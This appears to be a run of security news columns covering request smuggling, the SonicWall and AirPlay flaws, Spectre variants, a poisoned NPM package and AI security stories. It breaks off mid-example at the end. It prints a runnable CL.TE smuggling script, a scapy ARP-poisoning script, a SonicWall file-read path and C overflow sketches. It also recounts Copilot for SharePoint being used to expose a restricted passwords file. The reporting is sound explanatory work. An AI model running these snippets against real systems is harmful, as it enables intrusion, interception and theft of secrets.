[Thomas Stacey] of Assured has done work on HTTP smuggling/tunneling attacks, where multiple HTTP requests exist in a single packet. This style of attack works against web infrastructure that has a front-end proxy and a back-end worker. When the front-end and back-end parse requests differently, very unintended behavior can result.
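The textbook variant of this is the CL.TE desync, where the front-end trusts Content-Length and the back-end trusts Transfer-Encoding. A sketch of what that looks like on the wire — illustrative of the class, not necessarily the exact cases in [Thomas]’s work:

```python
import socket

# Classic CL.TE desync: a front-end honoring Content-Length forwards
# this as one request, while a back-end honoring Transfer-Encoding
# sees the chunked body end at "0\r\n\r\n" -- and treats the rest as
# the start of a *second* request. Host and path are placeholders.
PAYLOAD = (
    b"POST / HTTP/1.1\r\n"
    b"Host: victim.example\r\n"
    b"Content-Length: 34\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET /admin HTTP/1.1\r\n"
    b"X-Pad: x"
)

with socket.create_connection(("victim.example", 80)) as s:
    s.sendall(PAYLOAD)
    print(s.recv(4096).decode(errors="replace"))
```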

ONEKEY researchers have discovered a pair of issues in the Evertz core web administration interface, that together allow unauthenticated arbitrary command injection. Evertz manufactures very large video handling equipment, used widely in the broadcast industry, which is why it’s so odd that the ONEKEY private disclosure attempts were completely ignored. As the standard 90 day deadline has passed, ONEKEY has released the vulnerability details in full.

On the other hand, Mozilla is setting records of its own, releasing a Firefox update on the same day as exploits were revealed at Pwn2Own 2025. Last year Mozilla received the “Fastest to Patch” award, and may be on track to repeat that honor.

What does video game cheat development have to do with security research? It’s full of reverse engineering, understanding memory structures, hooking functions, and more. It’s all the things malware does to take over a system, and all the things a researcher does to find vulnerabilities and understand what binaries are doing. If you’re interested, there’s a great two-part series on the topic just waiting for you to dive into. Enjoy!

This Week in Security: Signal DRM, Modern Phone Phreaking, and the Impossible SSH RCE

Digital Rights Management (DRM) has been the bane of users since it was first introduced. Who remembers the battle it was to get Netflix running on Linux machines, or the literal legal fight over the DVD DRM decryption key? So the news from Signal, that DRM is finally being put to use to protect users, is ironic.

The reason for this is Microsoft Recall — the AI-powered feature that takes a snapshot of everything on the user’s desktop every few seconds. For whatever reason, you might want to exempt some windows from Recall’s memory. It doesn’t speak well for Microsoft’s implementation that the easiest way for an application to opt out of the feature is to mark its window as containing DRM content. Signal, the private communications platform, is using this to hide from Recall and other screenshotting applications.

The Signal blog warns that this may be just the start of agentic AI being rolled out with insufficient controls and permissions. The issue here isn’t the singularity or AI reaching sentience, it’s the same old security and privacy problems we’ve always had: too much information being collected, data being shared without permission, and an untrusted actor having access to way more than it should.

Legacy Malware?

The last few stories we’ve covered about malicious code in open source repositories have featured how quickly the bad packages were caught. Then there’s this story about two-year-old malicious packages on NPM that are just now being found.

It may be that the reason these packages weren’t discovered until now is that they aren’t looking to exfiltrate data, or steal bitcoin, or load other malware. Instead, these packages have a trigger date, and simply sabotage the systems they’re installed on — sometimes in rather subtle ways. If a web application you were writing was experiencing intermittent failures, how long would it take you to suspect malware in one of your JavaScript libraries?

Where Are You Calling From?

Phone phreaking isn’t dead, it has just gone digital. One of the possibly apocryphal origins of phone phreaking was a toy bo’sun whistle in boxes of cereal that just happened to play a 2600 Hz tone. More serious phreakers used more sophisticated, digital versions of the whistle, calling them blue boxes. In modern times, apparently, the equivalent of the blue box is a rooted Android phone. [Daniel Williams] has the story of playing with Voice over LTE (VoLTE) cell phone calls. A bug in the app he was using forced him to look at the raw network messages coming from O2 UK, his local carrier.

And those messages were weird. VoLTE is essentially using the Session Initiation Protocol (SIP) to handle cell phone calls as Voice over IP (VoIP) calls using the cellular data network. SIP is used in telephony all over the place, from desk phones to video conferencing solutions. SIP calls have headers that work to route the call, which can contain all sorts of metadata about the call. [Daniel] took a look at the SIP headers on a VoLTE call, and noticed some strange things. For one, the International Mobile Subscriber Identity (IMSI) and International Mobile Equipment Identity (IMEI) codes for both the sender and destination were available.

He also stumbled onto an interesting header, the Cellular-Network-Info header. This header encodes way too much data about the network the remote caller is connected to, including the exact tower being used. In an urban environment, that locates a cell phone to an area not much bigger than a city block. Together with leaking the IMSI and IMEI, this is a dangerous amount of information to leak to anyone on the network. [Daniel] attempted to report the issue to O2 in late March, and was met with complete silence. However, a mere two days after this write-up was published, on May 19th, O2 finally made contact and confirmed that the issue had been resolved.

ARP Spoofing in Practice

TCP has an inherent security advantage: because it’s a stateful connection, it’s much harder to make a connection from a spoofed IP address. Harder, but not impossible. One of the approaches that allows actual TCP connections from spoofed IPs is Address Resolution Protocol (ARP) poisoning. Ethernet switches don’t look at IP addresses, but instead route frames using MAC addresses. ARP is the protocol that distributes the MAC-address-to-IP mapping on the local network.

And like many protocols from early in the Internet’s history, ARP requests don’t include any cryptography and aren’t validated. Generally, whoever claims an IP address first wins, so the key is automating this process. Hence NetImposter, a new tool specifically designed to automate this process, sending spoofed ARP packets and establishing an “impossible” TCP connection.
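The heart of such a tool is only a few lines of scapy. A minimal sketch of just the ARP poisoning step — the spoofed TCP handshake built on top of it is where the real work lives:

```python
from scapy.all import ARP, Ether, conf, get_if_hwaddr, sendp

# Claim an IP on the local segment by answering for it with our own
# MAC -- the unauthenticated "first claim wins" behavior described
# above. Lab use only; needs privileges. Addresses are placeholders.
SPOOFED_IP = "192.168.1.200"
iface = conf.iface

frame = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(
    op=2,                         # is-at (ARP reply)
    psrc=SPOOFED_IP,              # "I am 192.168.1.200"
    hwsrc=get_if_hwaddr(iface),   # ...at our MAC address
    pdst="192.168.1.0/24",        # tell the whole segment
)
sendp(frame, iface=iface, verbose=False)
```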

Impossible RCE in SSH

Over two years ago, researchers at Qualys discovered a pre-authentication double-free in OpenSSH server version 9.1. Version 9.2 was quickly released, and because none of the major distributions had shipped 9.1 yet, what could have been a very nasty problem was patched pretty quietly. Because of the now-standard hardening features in modern Linux and BSD distributions, this vulnerability was thought to be impossible to actually leverage into Remote Code Execution (RCE).

If someone get a working OpenSSH exploit from this bug, I'm switching my main desktop to Windows 98 😂 (this bug was discovered by a Windows 98 user who noticed sshd was crashing when trying to login to a Linux server!)

— Tavis Ormandy (@taviso) February 14, 2023

The bug was famously discovered by attempting to SSH into a modern Linux machine from a Windows 98 machine, and Tavis Ormandy claimed he would switch to Windows 98 on his main machine if someone did actually manage to exploit it for RCE. [Perri Adams] thought this was a hilarious challenge, and started working on an exploit. Now we have good and bad news about this effort. [Perri] is pretty sure it is actually possible to groom the heap, and with enough attempts, overwrite an interesting pointer, leaking enough information in the process to overcome address randomization and get RCE. The bad news is that the reward of dooming [Tavis] to a Windows 98 machine for a while wasn’t quite enough to be worth the pain of turning the work into a fully functional exploit.

But that’s where [Perri’s] OffensiveCon keynote took an AI turn. How well would any of the cutting-edge AIs do at finding, understanding, fixing, and exploiting this vulnerability? As you probably already guessed, the results were mixed. Two of the three AIs thought the function just didn’t have any memory management problems at all. Once informed of the problem, the models had more useful analysis of the code, but they still couldn’t produce any remotely useful code for exploitation. [Perri’s] takeaway is that AI systems are approaching the threshold of being useful for defensive programming work. Distilling what code is doing, helping in reverse engineering, and working as a smarter sort of spell checker are all wins for programmers and security researchers. But fortunately, we’re not anywhere close to a world where AI is developing and deploying exploits.

Bits and Bytes

There are a pair of new versions of reverse engineering/forensics tools released very recently. Up first is Frida, a runtime debugger on steroids, which is celebrating its 17th major version release. One of the major features is migrating to pluggable runtime bridges, and moving away from strictly bundling them. We also have Volatility 3, a memory forensics framework. This isn’t the first Volatility 3 release, but it is the release where version three officially reaches parity with version two of the framework.

The Foscam X5 security camera has a pair of buffer overflows, each of which can be leveraged to achieve arbitrary RCE. One of the proof-of-concepts has a very impressive use of a write-null-anywhere primitive to corrupt a return pointer, and jump into a ROP gadget. The concerning element of this disclosure is that the vendor has been completely unresponsive, and the vulnerabilities are still unaddressed.

And finally, one of the themes that I’ve repeatedly revisited is that airtight attribution is really difficult. [Andy Gill] walks us through just one of the many reasons that’s difficult. Git cryptographically signs the contents of a commit, but not the timestamps. This came up when looking through the timestamps from “Jia Tan” in the XZ compromise. Git timestamps can be trivially rewritten. Attestation is hard.

This Week in Security: Lingering Spectre, Deep Fakes, and CoreAudio

Spectre lives. We’ve got two separate pieces of research, each finding new processor primitives that allow Spectre-style memory leaks. Before we dive into the details of the new techniques, let’s quickly remind ourselves what Spectre is. Modern CPUs use a variety of clever tricks to execute code faster, and one of the stumbling blocks is memory latency. When a program reaches a branch in execution, the program will proceed in one of two possible directions, and it’s often a value from memory that determines which branch is taken. Rather than wait for the memory to be fetched, modern CPUs will predict which branch execution will take, and speculatively execute the code down that branch. Once the memory is fetched and the branch is properly evaluated, the speculatively executed code is rewound if the guess was wrong, or made authoritative if the guess was correct. Spectre is the realization that incorrect branch prediction can change the contents of the CPU cache, and those changes can be detected through cache timing measurements. The end result is that arbitrary system memory can be leaked from a low privileged or even sandboxed user process.

In response to Spectre, OS developers and CPU designers have added domain isolation protections, that prevent branch prediction poisoning in an attack process from affecting the branch prediction in the kernel or another process. Training Solo is the clever idea from VUSec that branch prediction poisoning could just be done from within the kernel space, and avoid any domain switching at all. That can be done through cBPF, the classic Berkeley Packet Filter (BPF) kernel VM. By default, all users on a Linux system can run cBPF code, throwing the doors back open for Spectre shenanigans. There’s also an address collision attack where an unrelated branch can be used to train a target branch. Researchers also discovered a pair of CVEs in Intel’s CPUs, where prediction training was broken in specific cases, allowing for a wild 17 kB/sec memory leak.

Also revealed this week is the Branch Privilege Injection research from COMSEC. This is the realization that Intel Branch Prediction happens asynchronously, and in certain cases there is a race condition between the updates to the prediction engine, and the code being predicted. In short, user-mode branch prediction training can be used to poison kernel-mode prediction, due to the race condition.

(Editor’s note: Video seems down for the moment. Hopefully YouTube will get it cleared again soon. Something, something “hackers”.)

Both of these Spectre attacks have been patched by Intel with microcode, and the Linux kernel has integrated patches for the Training Solo issue. Training Solo may also impact some ARM processors, and ARM has issued guidance on the vulnerability. The real downside is that each fix seems to come with yet another performance hit.

Is That Real Cash? And What Does That Even Mean?

Over at the Something From Nothing blog, we have a surprisingly deep topic, in a teardown of banknote validators. For the younger in the audience, there was a time in years gone by where not every vending machine had a credit card reader built in, and the only option was to carefully straighten a bill and feed it into the bill slot on the machine. But how do those machines know it’s really a bill, and not just the right sized piece of paper?

And that’s where this gets interesting. Modern currency has multiple security features in a single bill, like magnetic ink, micro printing, holograms, watermarks, and more. But how does a bill validator check for all those things? Mainly LEDs and photodetectors, it seems. With some machines including hall effect sensors, magnetic tape heads for detecting magnetic ink, and in rare cases a full linear CCD for scanning the bill as it’s inserted. Each of those detectors (except the CCD) produces a simple data stream from each bill that’s checked. Surely it would be easy enough to figure out the fingerprint of a real bill, and produce something that looks just like the real thing — but only to a validator?

In theory, probably, but the combination of sensors presents a real problem. It’s really the same problem as counterfeiting a bill in general: implementing a single security feature is doable, but getting them all right at the same time is nearly impossible. And so it is with the humble banknote validator.

Don’t Trust That Phone Call

There’s a scam that has risen to popularity with the advent of AI voice impersonation. It usually takes the form of a young person calling a parent or grandparent from jail or a hospital, asking for money to be wired to make it home. It sounds convincing, because it’s an AI deepfake of the target’s loved one. This is no longer just a technique to take advantage of loving grandparents. The FBI has issued a warning about an ongoing campaign using deepfakes of US officials. The aim of this malware campaign seems to be just getting the victim to click on a malicious link. This same technique was used in a LastPass attack last year, and the technique has become so convincing, it’s not likely to go away anytime soon.

AI Searching SharePoint

Microsoft has tried not to be left behind in the current flurry of AI rollouts that every tech company seems to be engaging in. Microsoft’s SharePoint is not immune, and the result is Microsoft Copilot for SharePoint. This gives an AI agent access to a company’s SharePoint knowledge base, allowing users to query it for information. It’s AI as a better search engine. This has some ramifications for security, as SharePoint installs tend to collect sensitive data.

The first ramification is the most straightforward. The AI can be used to search for that sensitive data. But Copilot pulling data from a SharePoint file doesn’t count as a view, making for a very stealthy way to pull data from those sensitive files. Pen Test Partners found something even better on a real assessment. A passwords file hosted on SharePoint was unavailable to view, but in an odd way. This file hadn’t been locked down using SharePoint permissions, but instead the file was restricted from previewing in the browser. This was likely an attempt to keep eyes off the contents of the file. And Copilot was willing to be super helpful, pasting the contents of that file right into a chat window. Whoops.

Fuzzing Apple’s CoreAudio

Googler [Dillon Franke] has the story of finding a type confusion flaw in Apple’s CoreAudio daemon, reachable via Mach Inter-Process Communication (IPC) messages, allowing for potential arbitrary code execution from within a sandboxed process. This is a really interesting fuzzing + reverse engineering journey, and it starts with imagining the attack he wanted to find: Something that could be launched from within a sandboxed browser, take advantage of already available IPC mechanisms, and exploit a complex process with elevated privileges.

Coreaudiod ticks all the boxes, but it’s a closed source daemon. How does one approach this problem? The easy option is to just fuzz over the IPC messages. It would be a perfectly viable strategy, to fuzz CoreAudio via Mach calls. The downside is that the fuzzer would run slower, and have much less visibility into what’s happening in the target process. A much more powerful approach is to build a fuzzing harness that allows hooking directly to the library in question. There is some definite library wizardry at play here, linking into a library function that hasn’t been exported.

The vulnerability that he found was type confusion: the daemon expected an ioctl object, but could be supplied arbitrary data. An ioctl object contains a pointer to a vtable, which is essentially a collection of function pointers, and the daemon attempts to call a function from that table. It’s an ideal situation for exploitation. The fix from Apple is an explicit type check on the incoming objects.

Bits and Bytes

Asus publishes the DriverHub tool, a GUI-less driver updater. It communicates with driverhub.asus.com using RPC calls. The problem is that it checks for the right web URL using a wildcard, and driverhub.asus.com.mrbruh.com was considered completely valid. Among the functions DriverHub can perform is installing drivers and updates. Chaining a couple of fake updates together results in relatively easy admin code execution on the local machine, with the only prerequisites being the DriverHub software being installed, and a click on a single malicious link. Ouch.
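ASUS hasn’t published the offending code, but the class of bug is familiar enough to sketch — a substring or wildcard match on the origin where an exact match was needed:

```python
# Sketch of the bug class -- not ASUS's actual code.
def origin_allowed_broken(origin: str) -> bool:
    return "driverhub.asus.com" in origin          # substring match: wrong

def origin_allowed_fixed(origin: str) -> bool:
    return origin == "https://driverhub.asus.com"  # exact match

evil = "https://driverhub.asus.com.mrbruh.com"
print(origin_allowed_broken(evil))   # True -- the attacker's domain passes
print(origin_allowed_fixed(evil))    # False
```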

The VirtualBox VGA driver just patched a buffer overflow that could result in VM escape. The vmsvga3dSurfaceMipBufferSize call could be manipulated so no memory is actually allocated, but VirtualBox itself believes a buffer is there and writable. This memory write ability can be leveraged into arbitrary memory read and write capability on the host system.

And finally, what’s old is new again. APT28, a Russian state actor, has been using very old-school Cross Site Scripting (XSS) attacks to gain access to targets’ webmail systems. The attack here is JavaScript in an email’s HTML code. That JS then used already-known XSS exploits to exfiltrate emails and contacts. The worst part of this campaign is how low-effort it was. These aren’t cutting-edge 0-days. Instead, the targets’ email servers just hadn’t been updated. Keep your webmail installs up to date!

This Week in Security: Encrypted Messaging, NSO’s Judgement, and AI CVE DDoS

Cryptographic messaging has been in the news a lot recently. Like the formal audit of WhatsApp (the actual PDF). And the results are good. There are some minor potential problems that the audit highlights, but they are of questionable real-world impact. The most consequential is how easy it is to add additional members to a group chat. Or to put it another way, there are no cryptographic guarantees associated with adding a new user to a group.

The good news is that WhatsApp groups don’t allow new members to read previous messages. So a user getting added to a group doesn’t reveal historic messages. But a user added without being noticed can snoop on future messages. There’s an obvious question as to how this is a weakness. Isn’t it redundant, since anyone with permission to add someone to a group can already read the messages from that group?

That’s where the lack of cryptography comes in. To put it simply, the WhatsApp servers could add users to groups, even if none of the existing users actually requested the addition. It’s not a vulnerability per se, but definitely a design choice to keep in mind. Keep an eye on the members in your groups, just in case.

The Signal We Have at Home

The TeleMessage app has been pulled from availability, after it was used to compromise Signal communications of US government officials. There’s political hay to be made out of the current administration’s use and potential misuse of Signal, but the political angle isn’t what we’re here for. The TeleMessage client is Signal compatible, but adds message archiving features. Government officials and financial companies were using this alternative client, likely in order to comply with message retention laws.

While it’s possible to do long-term message retention securely, TeleMessage was not doing it particularly well. The messages are stripped of their end-to-end encryption in the client, before being sent to the archiving server. It’s not clear exactly how, but those messages were accessed by a hacker. This nicely demonstrates the inherent tension between the transparent archiving the US government requires for internal communications, and the need for end-to-end encryption.

The NSO Judgement

WhatsApp is in the news for another reason, this time winning a legal judgement against NSO Group over their Pegasus spyware. The $167 million in damages casts real doubt on the idea that NSO has immunity to develop and deploy malware simply because it’s doing so for governments. This case is likely to be appealed, and higher courts may have a different opinion on this key legal question, so hold on. Regardless, the era of NSO’s nearly unrestricted actions is probably over. They aren’t the only group operating in this grey legal space, and the other “legal” spyware/malware vendors are sure to be paying attention to this ruling as well.

The $5 Wrench

In reality, the weak point of any cryptography scheme is the humans using it. We’re beginning to see real-world re-enactments of the famous XKCD $5 wrench, which can defeat even 4096-bit RSA encryption. In this case, it’s the application of old crime techniques to new technology like cryptocurrency. To quote Ars Technica:

We have reached the “severed fingers and abductions” stage of the crypto revolution

The flashy stories involve kidnapping and torture, but let’s not forget that the most common low-tech approach is simple deception. Whether you call it the art of the con or social engineering, this is still the most likely way to lose your savings, whether they’re held in conventional currency or cryptocurrency.

The SonicWall N-day

WatchTowr is back with yet another reverse-engineered vulnerability. More precisely, it’s two CVEs that are being chained together to achieve pre-auth Remote Code Execution (RCE) on SonicWall appliances. This exploit chain has been patched, but not everyone has updated, and the vulnerabilities are being exploited in the wild.

The first vulnerability at play is actually from last year, and is in Apache’s mod_rewrite module. This module is widely used to map URLs to source files, and it has a filename confusion issue where a URL-encoded question mark in the path can break the mapping to the final filesystem path. A second issue is that when DocumentRoot is specified, instances of RewriteRule take on a weird dual meaning. The filesystem target refers to the location inside DocumentRoot, but that location is first checked against the filesystem root itself. This was fixed in Apache nearly a year ago, but it takes time for patches to roll out.

SonicWall was using a rewrite rule to serve CSS files, and the regex used to match those files is just flexible enough to be abused for arbitrary file read. /mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css matches that rule, but includes the URL-encoded question mark, and matches a location on the root filesystem. There are other, more interesting files to access, like the temp.db SQLite database, which contains session keys for the currently logged-in users.

The other half of this attack is a really clever command injection using one of the diagnostic tools included in the SonicWall interface. Traceroute6 is straightforward, running a traceroute6 command and returning the results. It also has good data sanitization, blocking all of the easy ways to break out of the traceroute command and execute arbitrary code. The weakness is that while this sanitization adds backslashes to escape quotes and other special symbols, it stores the result in a fixed-length result buffer. If the escaping process overflows the result buffer, it writes over the null terminator and into the buffer that holds the original command before it’s sanitized. That corruption carries through when the command is run, and with some careful crafting, this escapes the sanitization and injects arbitrary commands. Clever.
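
Here's a simplified sketch of that bug shape in C. The struct layout, buffer sizes, and sanitize() logic are all invented for illustration, not SonicWall's actual code:

#include <stdio.h>
#include <string.h>

struct diag {
    char sanitized[64];    /* fixed-length result buffer */
    char original[128];    /* raw command line, adjacent in memory */
};

static void sanitize(struct diag *d, const char *input) {
    size_t out = 0;
    for (size_t i = 0; input[i] != '\0'; i++) {
        if (input[i] == '"' || input[i] == '\\' || input[i] == '`')
            d->sanitized[out++] = '\\';  /* add an escape character... */
        d->sanitized[out++] = input[i];  /* ...with no bounds check: a
                                            quote-heavy input runs past
                                            sanitized[] into original[] */
    }
    d->sanitized[out] = '\0';
}

int main(void) {
    struct diag d;
    strcpy(d.original, "traceroute6 ::1");
    /* 50 quotes become 100 bytes after escaping, overflowing sanitized[64]
     * and rewriting the start of the command that actually gets run. */
    char payload[51];
    memset(payload, '"', 50);
    payload[50] = '\0';
    sanitize(&d, payload);
    printf("%s\n", d.original);   /* no longer what was checked */
    return 0;
}

The sanitizer itself is what smashes the adjacent buffer, so the more special characters the attacker supplies, the further the escaped output spills into the raw command.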

The AI CVE DDoS

[Daniel Stenberg], lead developer of curl, is putting his foot down. We’ve talked about this before, even chatting with Daniel about the issue when we had him on FLOSS Weekly. Curl’s bug bounty project has attracted quite a few ambitious people who don’t actually have the skills to find vulnerabilities in the curl codebase. Instead, these amateur security researchers are using LLMs to “find vulnerabilities”. Spoiler: LLMs aren’t yet capable of this task. But LLMs are capable of writing fake vulnerability reports that look very convincing at first read. The game is usually revealed when the project asks a question, and the fake researcher feeds the LLM’s response back into the bug report.

This trend hasn’t slowed, and the curl project is now viewing the AI-generated vulnerability reports as a form of DDoS. In response, the curl HackerOne bounty program will soon ask a question with every entry: “Did you use an AI to find the problem or generate this submission?” An affirmative answer won’t automatically disqualify the report, but it definitely puts the burden on the reporter to demonstrate that the flaw is real and wasn’t hallucinated. Additionally, “AI slop” reports will result in permanent bans for the reporter.

It’s good to see that not all AI content is completely disallowed, as it’s very likely that LLMs will be involved in finding and describing vulnerabilities before long. Just not in this naive way, where a single prompt results in a vulnerability “find” and generates a patch that doesn’t even apply. Ironically, one of the tells of an AI-generated report is that it’s too perfect, particularly for someone’s first report. AI is still the hot new thing, so this issue likely isn’t going away any time soon.

Bits and Bytes

A supply chain attack has hit several hundred Magento e-commerce sites, via at least three software vendors distributing malicious code. One of the very odd elements to this story is that the malicious code appears to have been incubating for six years, and was only recently invoked for malicious behavior.

On the WordPress side of the fence, the Ottokit plugin was updated last month to fix a critical vulnerability. That update was force pushed to the majority of WordPress sites running that plugin, but that hasn’t stopped threat actors from attempting to use the exploit, with the first attempts coming just an hour and a half after disclosure.

It turns out it’s probably not a great idea to allow control codes as part of file names. PortSwigger has a report of a couple of ways VS Code can do the wrong thing with such filenames.

And finally, this story comes with a disclaimer: Your author is part of Meshtastic Solutions and the Meshtastic project. We’ve talked about Meshtastic a few times here on Hackaday, and would be remiss not to point out CVE-2025-24797. This buffer overflow could theoretically result in RCE on the node itself. I’ve seen at least one suggestion that this is a wormable vulnerability, which may be technically true, but seems quite impractical. Upgrade your nodes to at least release 2.6.2 to get the fix.

This Week in Security: AirBorne, EvilNotify, and Revoked RDP

This week, Oligo has announced the AirBorne series of vulnerabilities in the Apple AirPlay protocol and SDK. This is a particularly serious set of issues, and notably affects MacOS desktops and laptops, iOS and iPadOS mobile devices, and the many IoT devices that use the Apple SDK to provide AirPlay support. It’s a group of 16 CVEs based on 23 total reported issues, with ramifications ranging from an authentication bypass, to local file reads, all the way to Remote Code Execution (RCE).

AirPlay is a WiFi-based peer-to-peer protocol, used to share or stream media between devices. It uses port 7000, and a custom protocol that has elements of both HTTP and RTSP. This scheme makes heavy use of property lists (“plists”) for transferring serialized information. And as we well know, serialization and data parsing interfaces are great places to look for vulnerabilities. Oligo provides an example where a plist is expected to contain a dictionary object, but is actually constructed with a simple string. De-serializing that plist results in a malformed dictionary, and attempting to access it will crash the process.
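
This kind of root-object type confusion is easy to picture in code. Here's a toy sketch in C, with hypothetical types (plist_node, first_key) standing in for Apple's actual plist machinery:

#include <stdio.h>

typedef enum { T_STRING, T_DICT } ptype;

typedef struct {
    ptype type;
    union {
        const char *str;
        struct { const char **keys; int count; } dict;
    } u;
} plist_node;

static const char *first_key(const plist_node *root) {
    /* The missing check: if (root->type != T_DICT) return NULL; */
    return root->u.dict.keys[0];   /* garbage dereference when root
                                      is actually a string */
}

int main(void) {
    /* The "deserialized" root is a string, but gets accessed as a dict. */
    plist_node evil = { .type = T_STRING, .u.str = "not a dict" };
    printf("%s\n", first_key(&evil));   /* undefined behavior, likely crash */
    return 0;
}

A crash is the benign outcome; as the next demo shows, the same class of confusion can sometimes be steered into memory corruption instead.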

Another demo uses AirPlay to achieve an arbitrary memory write against a MacOS device. Because it’s such a powerful primitive, this can be used for zero-click exploitation, though the actual demo uses the music app, and launches with a user click. Prior to the patch, this affected any MacOS device with AirPlay enabled and set to either “Anyone on the same network” or “Everyone”. Because of the zero-click nature, this could be made into a wormable exploit.

Apple has released updates for their products for all of the CVEs, but what’s really going to take a long time to clean up is the IoT devices that were built with the vulnerable SDK. It’s likely that many of those devices will never receive updates.

EvilNotify

It’s apparently the week for Apple exploits, because here’s another one, this time from [Guilherme Rambo]. Apple has built multiple systems for doing Inter Process Communications (IPC), but the simplest is the Darwin Notification API. It’s part of the shared code that runs on all of Apple’s OSs, and this IPC has some quirks. Namely, there’s no verification system, and no restrictions on which processes can send or receive messages.

That led our researcher to ask what you may be asking: does this lack of authentication allow for any security violations? Among the many novel notifications this technique can spoof, there’s one that’s particularly problematic: the device “restore in progress”. This locks the device, leaving only a reboot option. Annoying, but not a permanent problem.

The really nasty version of this trick is to put the code triggering a “restore in progress” message inside an app’s widget extension. iOS loads those automatically at boot, making for an infuriating bootloop. [Guilherme] reported the problem to Apple, and made a very nice $17,500 in the process. The fix from Apple is a welcome surprise, in that they added an authorization mechanism for sensitive notification endpoints. It’s very likely that there are other ways this technique could have been abused, so the more comprehensive fix was the way to go.

Jenkins

Continuous Integration is one of the most powerful tools a software project can use to stay on top of code quality. Unfortunately, as those CI toolchains get more complicated, they become more likely to be vulnerable, as [John Stawinski] from Praetorian has discovered. This attack chain targets the Node.js repository on GitHub via an outside pull request, and ends with code execution on the Jenkins host machines.

The trick to pulling this off is to spoof the timestamp on a pull request. The Node.js CI uses PR labels to control what CI will do with the incoming request. Tooling automatically adds the “needs-ci” label depending on which files are modified. A maintainer reviews the PR and approves the CI run. A Jenkins runner then picks up the job, checks that the Git timestamp predates the maintainer’s approval, and runs the CI job. Git timestamps are trivial to spoof (git will happily stamp a commit with whatever GIT_AUTHOR_DATE and GIT_COMMITTER_DATE specify), so it’s possible to push an additional commit to the target PR with a commit timestamp in the past. The runner doesn’t catch the deception, and runs the now-malicious code.

[John] reported the findings, and the Node.js maintainers jumped into action right away. The primary fix was to validate Jenkins runs with SHA sum comparisons, rather than just relying on timestamps. Out of an abundance of caution, the Jenkins runners were re-imaged, and then [John] was invited to try to recreate the exploit. The Node.js blog post has some additional thoughts on this exploit, like pointing out that it’s a Time-of-Check-Time-of-Use (TOCTOU) exploit. We don’t normally think of TOCTOU bugs where a human is the “check” part of the equation.

2024 in 0-days

Google has published an overview of the 75 zero-day vulnerabilities that were exploited in 2024. That’s down from the 98 vulnerabilities exploited in 2023, but the Threat Intelligence Group behind this report is of the opinion that we’re still on an upward trend for zero-day exploitation. Some platforms like mobile and web browsers have seen drastic improvements in zero-day prevention, while attacks on enterprise targets are on the rise. The real standout is the targeting of security appliances and other network devices, at more than 60% of the vulnerabilities tracked.

When it comes to the attackers behind exploitation, it’s a mix between state-sponsored attacks, legal commercial surveillance, and financially motivated attacks. It will be interesting to see how 2025 stacks up in comparison. But one thing is for certain: Zero-days aren’t going away any time soon.

Perplexing Passwords for RDP

The world of computer security just got an interesting surprise, as Microsoft declared it not-a-bug that Windows machines will continue to accept revoked credentials for Remote Desktop Protocol (RDP) logins. [Daniel Wade] discovered the issue and reported it to Microsoft, and then after being told it wasn’t a security vulnerability, shared his report with Ars Technica.

So what exactly is happening here? It’s the case of a Windows machine that logs in via Azure or a Microsoft account. That account is used to enable RDP, and the machine caches the username and password so logins work even when the computer is “offline”. The problem comes in how those cached passwords are evicted from the cache. When it comes to RDP logins, it seems they simply never are.

There is a stark disconnect between what [Wade] has observed and what Microsoft has to say about it. It’s long been known that Windows machines will cache passwords, but that cache gets updated the next time the machine logs in to the domain controller. This is what Microsoft’s responses seem to be referencing. The actual report is that in the case of RDP, the cached passwords never expire, regardless of changing that password in the cloud and logging on to the machine repeatedly.

Bits and Bytes

Samsung makes a digital signage line, powered by the MagicINFO server application. That server has an unauthenticated endpoint, accepting file uploads with insufficient filename sanitization. That combination leads to arbitrary pre-auth code execution. While that’s not great, what makes this a real problem is that the report was first sent to Samsung in January, no response was ever received, and it seems that no fixes have officially been published.

A series of Viasat modems have a buffer overflow in their SNORE web interface. This leads to unauthenticated, arbitrary code execution on the system, from either the LAN or OTA interface, but thankfully not from the public Internet itself. This one is interesting in that it was found via static code analysis.

IPv6 is the answer to all of our IPv4-induced woes, right? It has Stateless Address Autoconfiguration (SLAAC) to handle IP addressing without DHCP, and Router Advertisement (RA) messages to discover how to route packets. And now, taking advantage of that great functionality is Spellbinder, a malicious tool to pull off SLAAC attacks and do DNS poisoning. It’s not entirely new, as we’ve seen man-in-the-middle attacks on IPv4 networks for years. IPv6 just makes it so much easier.

This Week in Security: XRP Poisoned, MCP Bypassed, and More

Researchers at Aikido run the Aikido Intel system, an LLM security monitor that ingests the feeds from public package repositories, and looks for anything unusual. In this case, the unusual activity was five rapid-fire releases of the xrpl package on NPM. That package is the XRP Ledger SDK from Ripple, used to manage keys and build crypto wallets. While quick point releases happen to the best of developers, these were odd, in that there were no matching releases in the source GitHub repository. What changed in the first of those fresh releases?

The most obvious change is the checkValidityOfSeed() function added to index.ts. That function takes a string, and sends a request to a rather odd URL, using the supplied string as the ad-referral header for the HTTP request. The name of the function is intended to blend in, but knowing that the string parameter is sent to a remote web server is terrifying. The seed is usually the root of trust for an individual’s cryptocurrency wallet. Looking at the actual usage of the function confirms that this code is stealing credentials and keys.

The releases were made by a Ripple developer’s account. It’s not clear exactly how the attack happened, though credential compromise of some sort is the most likely explanation. Each of those five releases added another bit of malicious code, demonstrating that there was someone with hands on keyboard, watching what data was coming in.

The good news is that the malicious releases only managed a total of 452 downloads for the few hours they were available. A legitimate update to the library, version 4.2.5, has been released. If you’re one of the unfortunate 452 downloads, it’s time to do an audit, and rotate the possibly affected keys.

Zyxel FLEX

More specifically, we’re talking about Zyxel’s USG FLEX H series of firewall/routers. This is Zyxel’s new Arm64 platform, running a Linux system they call Zyxel uOS. The series targets even higher data throughput, and given that it’s a new platform, there are some interesting security bugs to find, as discovered by [Marco Ivaldi] of hn Security and [Alessandro Sgreccia] at 0xdeadc0de. Together they discovered an exploit chain that allows an authenticated user with VPN-only access to perform a complete device takeover, with root shell access.

The first bug is a wild one, and is definitely something for us Linux sysadmins to be aware of. How do you handle a user on a Linux system who shouldn’t have shell access over SSH? I’ve faced this problem when a customer needed SFTP access to a web site, but definitely didn’t need to run bash commands on the server. The solution is to set the user’s shell to nologin, so when SSH connects and runs the shell, it prints a message and exits, terminating the SSH connection. Based on the code snippet, the FLEX is doing something similar, perhaps with -false set as the shell instead:

$ ssh user@192.168.169.1
(user@192.168.169.1) Password:
